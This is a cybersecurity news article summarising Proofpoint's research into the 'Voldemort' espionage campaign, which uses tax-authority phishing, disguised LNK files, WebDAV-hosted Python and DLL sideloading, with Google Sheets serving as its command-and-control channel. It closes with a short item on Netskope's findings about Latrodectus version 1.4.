Cybersecurity experts have uncovered a new malware operation that uses Google Sheets as a command-and-control (C2) platform.
Starting on August 5, 2024, Proofpoint detected this activity, where cybercriminals impersonate tax authorities from various countries in Europe, Asia, and the U.S. The campaign targets over 70 organizations globally, using a custom tool called Voldemort designed to gather data and deploy further malicious software.
The targeted industries include insurance, aerospace, transportation, academia, finance, technology, industrial sectors, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecommunications, and social benefit organizations.
This suspected cyber espionage operation hasn’t been linked to any known threat actor. The attackers have sent approximately 20,000 emails as part of the campaign.
These emails falsely claim to be from tax authorities in countries like the U.S., U.K., France, Germany, Italy, India, and Japan, informing recipients about updates to their tax filings and urging them to click on Google AMP Cache URLs that redirect them to a secondary webpage.
This landing page checks the User-Agent string to identify if the operating system is Windows. If so, it exploits the search-ms: URI protocol handler to display a Windows shortcut (LNK) file disguised as a PDF through Adobe Acrobat Reader, tricking the user into opening it.
“If the LNK file is executed, it triggers PowerShell to run Python.exe from a WebDAV share (\library), which then runs a Python script from another share (\resource) on the same host,” explained Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson.
This method runs the Python script directly, without downloading files to the user’s computer, as the necessary dependencies are loaded from the WebDAV share.
The script is crafted to collect system information, sending the data as a Base64-encoded string to a domain controlled by the attackers. Following this, a decoy PDF is shown to the user, and a password-protected ZIP file is downloaded from OpenDrive.
Inside the ZIP file are two components: a legitimate executable “CiscoCollabHost.exe” that is vulnerable to DLL side-loading, and a malicious DLL “CiscoSparkLauncher.dll” (known as Voldemort), which is sideloaded.
Voldemort is a custom backdoor written in C, capable of gathering information and deploying further payloads. The malware leverages Google Sheets for C2, data exfiltration, and executing commands from the attackers.
Proofpoint described the campaign as aligned with advanced persistent threats (APT) but noted it has elements common in cybercrime, such as using techniques popular among e-criminals.
“Threat actors exploit file schema URIs to access external file-sharing resources for staging malware, particularly WebDAV and Server Message Block (SMB). This is done by using the schema ‘file://’ to connect to a remote server hosting the malicious content,” the researchers noted.
This approach has become more common among malware families that act as initial access brokers (IABs), such as Latrodectus, DarkGate, and XWorm.
Additionally, Proofpoint was able to access the contents of the Google Sheet used by the attackers, identifying six victims, one of whom might be a sandbox or a “known researcher.”
The campaign’s unusual nature suggests that the attackers cast a wide net before focusing on a smaller group of targets. It’s also possible that the perpetrators, who may have varying levels of technical skill, aimed to infect multiple organizations.
“While many aspects of this campaign resemble cybercriminal activity, we believe this is likely espionage aimed at supporting still unknown objectives,” the researchers stated.
“The mix of advanced and basic techniques used in this campaign makes it challenging to assess the threat actor’s full capabilities and to determine with high confidence the ultimate goals of the operation.”
This discovery coincides with Netskope Threat Labs uncovering an updated version of Latrodectus (version 1.4), which includes a new C2 endpoint and adds two new backdoor commands that allow it to download shellcode from a specified server and retrieve arbitrary files from a remote location.
“Latrodectus has been rapidly evolving, adding new features to its payload,” said security researcher Leandro Fróes. “Understanding these updates helps defenders to adjust their automated pipelines and improve the detection of new variants.”